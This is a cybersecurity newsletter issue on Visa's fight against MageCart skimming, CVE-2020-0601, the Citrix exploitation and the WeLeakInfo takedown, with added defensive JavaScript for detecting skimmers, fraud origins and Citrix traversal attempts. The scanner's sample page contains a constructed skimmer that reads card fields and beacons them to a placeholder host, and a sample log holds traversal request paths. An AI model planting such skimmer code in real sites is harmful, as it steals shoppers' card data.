
Robin’s Newsletter #83

 Vol. 3  Iss. 3  19/01/2020, last updated 06/04/2020   Robin Oldham  ~6 Minutes

This week

Changing the economics of cybercrime

A short but interesting read this week on how the team at Visa are working to tackle MageCart payment card fraud.

MageCart attacks work by adding virtual ‘card skimmers’ (malicious JavaScript) to the checkout pages of hacked eCommerce websites. When a user fills out their card details a copy is encoded and sent to the criminal gang. Because the details are intercepted as the user types them into the web browser, the attackers see the full card number, expiry date and the all-important three- or four-digit card verification code - the one value a merchant is not allowed to store, which is why skimming the browser is so much more valuable than breaching a database. These can then be used by the criminals themselves or, more often, bundled up and sold on to other crooks.

Visa plans to ‘devalue and disrupt’ the economics of these attacks.

Devaluation will be achieved by moving away from static card numbers that are valid for many years towards shorter-term tokens. These tokens are often referred to as Device, or Virtual, account numbers. It’s the same sort of technology that powers contactless services like Apple Pay and Google Pay. A token is bound to the device or merchant it was issued to and has an expiry, so one that is skimmed is of little use anywhere else.

‘Wallets’ like this only require you to enter the card details once, meaning the opportunity for an attacker to steal the card information is hugely reduced. They’re also great for users, simplifying how you pay for things online whilst increasing consumer protection.

Disruption is achieved by investing in engineering and operations teams.

Engineering teams have developed tools to help vendors scan their sites for malware like MageCart, which has helped to prevent attacks ‘potentially saving merchants $141 million.’ These tools not only help individual website owners but also protect the wider Visa network.
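As an added example of what such a scan looks for (example code, not Visa’s tool and not from the newsletter), the following checks a checkout page for the two indicators described above: third-party scripts from hosts nobody allow-listed, and inline scripts that both read the card fields and beacon data to a foreign host. The page, its skimmer-like inline snippet and the names scanCheckoutPage and SAMPLE_PAGE are all constructed for this illustration.

```javascript
// Added illustration of a Magecart-style checkout scan (example code, not the
// tool Visa describes nor anything from the newsletter). The page below and its
// skimmer-like inline script are constructed; names are hypothetical.

const SAMPLE_PAGE = `
<html><body>
<form id="checkout"><input id="cc-number"><input id="cc-cvc"></form>
<script src="https://shop.example/static/app.js"></script>
<script src="https://js.psp.example/v1/checkout.js"></script>
<script src="https://cdn-stats.example/jquery.min.js"></script>
<script>
  // constructed skimmer-like snippet: reads the card fields and beacons them out
  document.getElementById('checkout').addEventListener('submit', function () {
    var d = { n: document.getElementById('cc-number').value,
              c: document.getElementById('cc-cvc').value };
    new Image().src = 'https://cdn-stats.example/i.gif?d=' + btoa(JSON.stringify(d));
  });
</script>
<script>document.title = 'Checkout';</script>
</body></html>`;

function hostOf(url, base) {
  try { return new URL(url, base).hostname; } catch (e) { return null; }
}

// Heuristic: an inline script that both reads form fields and has a sink
// pointing at a host other than the shop's own. Skimmers that assemble the URL
// at run time or hide inside a trusted third-party file will slip past a static
// check like this, so a clean result means "nothing obvious", not "nothing".
function inlineScriptFindings(body, firstPartyHost) {
  const readsFields = /\.value\b|new\s+FormData\b|serialize\s*\(/.test(body);
  const usesSink = /\bfetch\s*\(|XMLHttpRequest|sendBeacon|new\s+Image\b|\.src\s*=|\.action\s*=/.test(body);
  const urls = body.match(/https?:\/\/[^\s'"`)]+/g) || [];
  const foreign = [...new Set(urls.map(u => hostOf(u)))].filter(h => h && h !== firstPartyHost);
  if (!(readsFields && usesSink)) return [];
  return foreign.map(host => ({ kind: 'inline-exfil', host }));
}

// Walk every <script> on the page. External scripts must come from the shop
// itself or an explicitly allow-listed host (e.g. the payment provider).
function scanCheckoutPage(html, firstPartyHost, allowedScriptHosts) {
  const base = `https://${firstPartyHost}/`;
  const allowed = new Set([firstPartyHost, ...allowedScriptHosts]);
  const findings = [];
  const tag = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = tag.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = (attrs.match(/\bsrc\s*=\s*["']([^"']+)["']/i) || [])[1];
    if (src) {
      const host = hostOf(src, base);
      if (!allowed.has(host)) findings.push({ kind: 'unexpected-script-host', host, src });
    } else {
      findings.push(...inlineScriptFindings(body, firstPartyHost));
    }
  }
  return findings;
}

function scanSample() {
  return scanCheckoutPage(SAMPLE_PAGE, 'shop.example', ['js.psp.example']);
}

console.log(scanSample());
```

On the constructed page the scan reports two findings, both pointing at cdn-stats.example: the un-allow-listed script and the inline beacon. Allow-listing that host silences only the first; the exfiltration finding stays, because it is judged against the shop’s own origin rather than the script allow-list. The corresponding prevention is a Content Security Policy whose connect-src, img-src and form-action directives are restricted to the shop and its payment provider, which would have stopped this beacon regardless of how the script got onto the page.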

Operational teams conduct data analysis of transaction patterns. This can be used not just for an individual user (are you really on holiday in Brazil?) but at macro levels: ‘the common vendor amongst these 100 different fraud cases is X.’

It was this kind of visibility into transaction patterns that let challenger bank Monzo be the first to spot the Ticketmaster MageCart incident (vol. 1, iss. 2). Centralised payment providers like Mastercard and Visa, or inter-bank providers like SWIFT, have this visibility at scale.
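The macro-level analysis described in the two paragraphs above is usually called ‘common point of purchase’ analysis. Here is an added worked example of it (example code, not Visa’s or Monzo’s system and not from the newsletter): given a set of cards reported as fraudulent and their purchase history, it ranks merchants by what share of the victims shopped there before their fraud began, compared with the merchant’s share of all cards. The transactions, card ids and merchant names are constructed, and commonPointOfPurchase and the other names are hypothetical.

```javascript
// Added illustration of "common point of purchase" analysis (example code, not
// Visa's or Monzo's system, nor from the newsletter). Data and names constructed.

// One record per purchase: which card, at which merchant, on which day.
const TXNS = [
  { card: 'c1', merchant: 'tickets.example', day: 1 },
  { card: 'c1', merchant: 'grocer.example',  day: 2 },
  { card: 'c1', merchant: 'fuel.example',    day: 3 },
  { card: 'c1', merchant: 'cafe.example',    day: 11 }, // after c1's fraud began: cannot be the leak
  { card: 'c2', merchant: 'tickets.example', day: 2 },
  { card: 'c2', merchant: 'grocer.example',  day: 4 },
  { card: 'c3', merchant: 'tickets.example', day: 2 },
  { card: 'c3', merchant: 'fuel.example',    day: 5 },
  { card: 'c4', merchant: 'tickets.example', day: 3 },
  { card: 'c4', merchant: 'grocer.example',  day: 6 },
  { card: 'c5', merchant: 'grocer.example',  day: 2 }, // c5 and c6: no fraud reported
  { card: 'c5', merchant: 'fuel.example',    day: 4 },
  { card: 'c6', merchant: 'grocer.example',  day: 5 },
];

// Cards reported as compromised, with the day the first fraudulent use was seen.
const FRAUD_REPORTS = { c1: 10, c2: 11, c3: 10, c4: 12 };

// For each merchant: what share of the compromised cards shopped there before
// their fraud started (coverage), and how that compares with the merchant's
// share of all cards (lift). A merchant every victim used, but few others did,
// is the prime suspect.
function commonPointOfPurchase(txns, fraudReports, minCoverage = 0.5) {
  const compromised = new Set(Object.keys(fraudReports));
  const totalCards = new Set(txns.map(t => t.card)).size;
  const perMerchant = new Map(); // merchant -> { comp: Set, all: Set }
  for (const t of txns) {
    if (!perMerchant.has(t.merchant)) perMerchant.set(t.merchant, { comp: new Set(), all: new Set() });
    const s = perMerchant.get(t.merchant);
    s.all.add(t.card);
    // Only a purchase made before the fraud appeared can be where the card leaked.
    if (compromised.has(t.card) && t.day < fraudReports[t.card]) s.comp.add(t.card);
  }
  const ranked = [];
  for (const [merchant, s] of perMerchant) {
    const coverage = s.comp.size / compromised.size;
    if (coverage < minCoverage) continue; // drop merchants only a few victims used
    const lift = coverage / (s.all.size / totalCards);
    ranked.push({ merchant, compromisedCards: s.comp.size, allCards: s.all.size,
                  coverage, lift: Number(lift.toFixed(2)) });
  }
  return ranked.sort((a, b) => b.coverage - a.coverage || b.lift - a.lift);
}

console.log(commonPointOfPurchase(TXNS, FRAUD_REPORTS));
```

On the constructed data tickets.example comes out on top: all four victims shopped there and no clean card did, whereas grocer.example was used by three victims but also by both clean cards, which is what the lift column captures. The ‘before the fraud began’ filter matters in practice: a merchant a victim used after their card was already being abused is a red herring, not a lead.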

Financial services are well placed to help systemically tackle cybercrime. The whole point of most cybercrime is economic gain for the criminals. Increased connectivity has made it easier to carry out fraud across jurisdictions, but it also increases the criminals’ reliance on the same financial systems to move the proceeds of their crimes. There are opportunities to detect this upfront, or to prevent funds from being consolidated and liquidated.

The other sector with a unique vantage point is telecoms, who provide the wired and wireless conduits over which we access services and conduct transactions online. BT, one of the largest Internet Service Providers in the UK, already blocks more than 100 million connections every month[1] to websites peddling malware. There are, of course, lines to be considered around privacy, net neutrality and free speech. Though we shouldn’t let perfection be the enemy of success.

There is good news to be found. Research led by Ross Anderson[2] shows that over the latter two-thirds of the previous decade the value of payment fraud more than doubled. The total value of payments did too, meaning that, as a proportion, payment fraud is actually down.

Steps like this are making a contribution. The good folks are winning.

Systemic changes like this are what will help tackle cybercrime - it’s not something that should be left to every organisation (or individual) - we need to keep changing the economics instead of blaming the user. zdnet.com, [1] btplc.com, [2] econinfosec.org (PDF)

Interesting stats

$7M: the cost of the ransomware outbreak to the City of New Orleans, with a $3M payout from the city’s insurer and 3,400 computers needing to be cleaned [https://www.fox8live.com/2020/01/15/city-new-orleans-says-it-will-take-months-recover-recent-cyber-attack/]

334: vulnerabilities fixed in Oracle’s largest ever ‘Critical Patch Update’ [https://www.zdnet.com/article/oracle-just-released-a-whopping-334-security-fixes-in-critical-patch-update/]

$380.5M: the Equifax class-action settlement, with a $77.5M payday for the attorneys [https://www.cyberscoop.com/equifax-data-breach-settlement/]

Other newsy bits

Quite vulnerability / patch-heavy this week…

Microsoft patch critical vulnerability in cryptography library

This one, however, got bucket-loads of coverage: a flaw in the way Windows 10 and Server 2016/2019 validate elliptic-curve certificates (CVE-2020-0601, in the CryptoAPI library crypt32.dll) was patched by Microsoft this week. It affects certificates used to check websites (the padlock in the address bar) as well as those used to sign software; browsers that rely on Windows’ own certificate validation, such as Edge and Chrome, were affected, while Firefox, which ships its own, was not. The vulnerability was shared with Microsoft by the US National Security Agency, who also advised organisations to patch immediately. Given that phishing is the most common cyber-attack technique - for cybercriminals and nation-states alike - being able to spoof a valid login page for any web service would have been extremely valuable to an organisation like the NSA. Presumably, then, someone the NSA didn’t want using it has found the vulnerability and started using it. A fun demonstration came from researcher Saleem Rashid, who tweeted photos of the NSA and GitHub websites playing Rick Astley’s Never Gonna Give You Up. (The sites themselves weren’t compromised; rather, they were spoofed and the spoofed certificates validated as a result of the vulnerability.) theguardian.com, defense.gov (PDF), wired.com (rickroll)

Internet Explorer, Firefox remote code bugs exploited in the wild

Researchers at Chinese security firm Qihoo 360 have been credited with discovering and reporting bugs that are ‘being actively exploited in the wild’ in both Mozilla’s Firefox and Microsoft’s Internet Explorer. Both are memory-safety bugs in the browsers’ JavaScript engines that let a malicious web page execute code on a victim’s computer. Mozilla has shipped a fix in Firefox 72.0.1; at the time of writing Microsoft had only published an advisory with a workaround for Internet Explorer (restricting access to the jscript.dll scripting engine), with a patch to follow. techcrunch.com

Rival groups exploiting Citrix vulnerability

Last week I covered the bug in Citrix Application Delivery Controller (ADC) and Citrix Gateway, formerly both part of the NetScaler family (CVE-2019-19781). Citrix has promised patches by the end of the month, and in the meantime attackers have begun actively compromising Citrix servers on the web. At least one group is booting the others out and then closing the hole behind them, to keep access solely for themselves. FireEye, who have dubbed that group’s backdoor ‘NOTROBIN’ (no relation), have the technical details of the attacks. Until the patches land the only protection is Citrix’s published mitigation (a responder policy that blocks requests for ‘/vpns/’ paths reached by directory traversal); it is worth checking that it is actually in place, that it applies to your build (Citrix’s advisory lists builds on which it does not work), and that the box was not compromised before it was applied. theregister.co.uk, fireeye.com
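To support that last check, here is an added example (not from the newsletter, FireEye or Citrix) that runs over a web-server access log and flags requests matching the same two conditions Citrix’s interim mitigation keys on: a path under /vpns/, and whether it was reached via /../ traversal. The log lines are constructed and assumed to be in common log format; scanCitrixLog and the other names are hypothetical.

```javascript
// Added example (not from the newsletter, FireEye or Citrix): flag access-log
// entries whose path reaches /vpns/ via /../ traversal. Log lines constructed;
// common log format assumed; names hypothetical.

const SAMPLE_LOG = [
  '10.0.0.5 - - [12/Jan/2020:10:01:02 +0000] "GET /vpn/index.html HTTP/1.1" 200 1234',
  '198.51.100.7 - - [12/Jan/2020:10:02:15 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 0',
  '203.0.113.9 - - [12/Jan/2020:10:02:17 +0000] "POST /vpn/%2E%2E/vpns/portal/templates/x.xml HTTP/1.1" 200 0',
  '10.0.0.6 - - [12/Jan/2020:10:03:00 +0000] "GET /vpns/cfg/smb.conf HTTP/1.1" 403 0',
].join('\n');

// ip, ident, user, [timestamp], "METHOD path protocol", status
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+)[^"]*" (\d{3})/;

// Percent-decode once so %2E%2E is seen as '..'; a malformed escape is left
// as-is rather than aborting the scan. Double-encoded variants (%252E) are
// deliberately not unwrapped here.
function decodePath(p) {
  try { return decodeURIComponent(p); } catch (e) { return p; }
}

// Mirrors the two halves of the mitigation's condition as far as a log line
// allows: is this a /vpns/ path, and was it reached via /../ ? The policy also
// permits /vpns/ for authenticated SSL-VPN sessions, which a plain access log
// cannot tell us, so direct /vpns/ requests are marked for review rather than
// called malicious.
function classifyRequest(path) {
  const decoded = decodePath(path);
  if (!decoded.includes('/vpns/')) return null;
  return decoded.includes('/../') ? 'traversal' : 'review';
}

function scanCitrixLog(text) {
  const hits = [];
  for (const line of text.split('\n')) {
    const m = LINE_RE.exec(line);
    if (!m) continue; // not a request line we understand
    const [, ip, when, method, path, status] = m;
    const severity = classifyRequest(path);
    if (severity) hits.push({ ip, when, method, path, status: Number(status), severity });
  }
  return hits;
}

console.log(scanCitrixLog(SAMPLE_LOG));
```

On the constructed log the two traversal requests are flagged, including the percent-encoded one, and the direct /vpns/ request is listed for review. A traversal hit that returned 200 before the mitigation was in place is the signal to treat the appliance as compromised and rebuild it rather than just apply the mitigation, which is the scenario the NOTROBIN write-up describes.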

In brief

Good reads

  • Tor Hidden Services Are a Failed Technology, Harming Children, Dissidents and Journalists lawfareblog.com

Attacks, incidents & breaches

  • Aussie P&N bank suffers data breach scmagazine.com
  • Travelex services begin again after ransomware cyber-attack theguardian.com
  • Cut Undersea Cable Plunges Yemen Into Days-Long Internet Outage wired.com

Threat intelligence

Privacy

  • NIST Releases Version 1.0 of Privacy Framework nist.gov
  • All the Ways Facebook Tracks You—and How to Limit It wired.com
  • Verizon launches privacy-focused search engine called OneSearch cnet.com
  • EU considers banning facial recognition technology in public spaces zdnet.com

And finally

WeLeakInfo seized in joint operation

A website called WeLeakInfo was seized by the FBI in a multi-national law enforcement operation this week, led by the UK National Crime Agency. The site scooped up and indexed personal data exposed in data breaches; over 12 billion credentials were available via the site. Access to the treasure-trove of personal info was then sold to cybercriminals and fraudsters on a subscription basis. Two individuals linked to the site, from Northern Ireland and Finland, have been arrested and are believed to have made £200,000 from running it. theregister.co.uk